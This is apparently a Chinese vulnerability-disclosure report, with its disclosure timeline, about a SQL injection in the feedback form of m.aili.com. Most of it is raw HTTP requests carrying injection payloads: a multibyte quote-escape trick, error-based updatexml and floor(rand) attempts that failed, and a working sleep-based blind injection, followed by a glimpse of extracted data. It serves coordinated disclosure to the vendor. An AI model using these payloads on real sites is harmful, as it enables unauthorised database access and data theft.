2015-04-01: 细节已通知厂商并且等待厂商处理中 2015-04-01: 厂商已经确认,细节仅向厂商公开 2015-04-11: 细节向核心白帽子及相关领域专家公开 2015-04-21: 细节向普通白帽子公开 2015-05-01: 细节向实习白帽子公开 2015-05-16: 细节向公众公开
盲注
网站:m.aili.cominfo 和emil都存在注入,两个点结合才能利用首先是报错注入
POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1Referer: http://m.aili.com/setting/feedback/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5X-Forwarded-For: 127.0.0.1Content-Type: application/x-www-form-urlencodedHost: m.aili.comCookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447Content-Length: 40Accept-Encoding: gzip, deflate email='&dosubmit=%ef%bf%bd%e1%bd%bb&info= HTTP/1.1 200 OKDate: Fri, 20 Feb 2015 23:50:36 GMTServer: By AILI/3.3Content-Type: text/htmlX-Powered-By: PHP/5.2.14p1X-Via: 1.1 shhl147:9 (Cdn Cache Server V2.0)Connection: keep-aliveContent-Length: 1564 System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','')<!DOCTYPE html><html><head>
两个地方结合闭合括号才能利用,目测是二次注入
POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1Referer: http://m.aili.com/setting/feedback/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5X-Forwarded-For: 127.0.0.1Content-Type: application/x-www-form-urlencodedHost: m.aili.comCookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447Content-Length: 43Accept-Encoding: gzip, deflate email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=a HTTP/1.1 200 OKDate: Fri, 27 Feb 2015 13:24:21 GMTServer: By AILI/3.3Content-Type: text/htmlX-Powered-By: PHP/5.2.14p1X-Via: 1.1 jsycdx94:9 (Cdn Cache Server V2.0)Connection: keep-aliveContent-Length: 1566 System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','a\')<!DOCTYPE html><html><head>
构造如下报错注入不能成功
POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1Referer: http://m.aili.com/setting/feedback/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5X-Forwarded-For: 127.0.0.1Content-Type: application/x-www-form-urlencodedHost: m.aili.comCookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447Content-Length: 61Accept-Encoding: gzip, deflate email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))%23 这个payload也不行(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
暂时只能盲注
POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1Referer: http://m.aili.com/setting/feedback/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5X-Forwarded-For: 127.0.0.1Content-Type: application/x-www-form-urlencodedHost: m.aili.comCookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447Content-Length: 61Accept-Encoding: gzip, deflate email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,NULL%2bsleep(3))%23
出点数据吧:
database()=neqcmsK*
过滤
危害等级:高
漏洞Rank:16
确认时间:2015-04-01 11:22
裤子接二连三的被脱,真是……
暂无